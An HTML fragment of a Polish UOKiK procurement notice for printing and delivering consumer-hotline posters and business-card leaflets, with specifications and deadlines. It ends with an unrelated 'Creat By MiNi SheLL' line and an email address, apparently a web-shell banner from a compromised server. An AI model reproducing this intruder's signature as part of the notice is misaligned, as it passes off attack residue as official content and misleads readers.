9.	Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca wskazanego przez Zamawiającego (I piętro, bez windy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 20.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zmiana w pliku produkcyjnym, druk offsetowy oraz dostarczenie do siedziby UOKiK materiałów edukacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część III zmiana w pliku produkcyjnym, druk offsetowy oraz dostarczenie do siedziby UOKiK materiałów edukacyjnych wg następującej specyfikacji technicznej:

Plakat Infolinia konsumencka
format: A2
papier: kreda matowa 170g, 4+0, lakier dyspersyjny jednostronnie, brak listwowania
nakład: 2 000 szt.

Ulotka typu wizytówka Infolinia konsumencka
format: 90x55
papier: karton 300g, 4+4, folia błysk dwustronnie
typ: zaokrąglona
nakład: 10 000 szt. 

1.	Termin realizacji: 7 dni roboczych.
2.	W dniu podpisania umowy Wykonawca otrzyma pliki produkcyjne plakatu i ulotki typu wizytówki.
3.	Projekty graficzne stanowią załącznik do SIWZ.
4.	Zmiana w plikach plakatu i ulotki typu wizytówka polega na modyfikacji zamieszczonej treści.
5.	Wykonawca zobowiązany jest przedstawić Zamawiającemu naniesione zmiany każdej z publikacji i ulotki w ciągu 1 dnia roboczych od podpisania umowy. 
6.	Zamawiający zobowiązany jest do akceptacji bądź odrzucenia przy jednoczesnym zgłoszeniu uwag do naniesionej zmiany w terminie 1 dni roboczych od dnia ich dostarczenia przez Wykonawcę. 
7.	Wraz z dostawą publikacji Wykonawca zobowiązany jest przekazać zmienioną wersję publikacji oraz ulotek w postaci plików produkcyjnych oraz zwrócić płytę CD przekazaną w dniu podpisania umowy.
8.	Dostawa oznacza dostarczenie przedmiotu umowy do siedziby UOKiK oraz wniesienie do miejsca wskazanego przez Zamawiającego (I piętro, bez windy)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com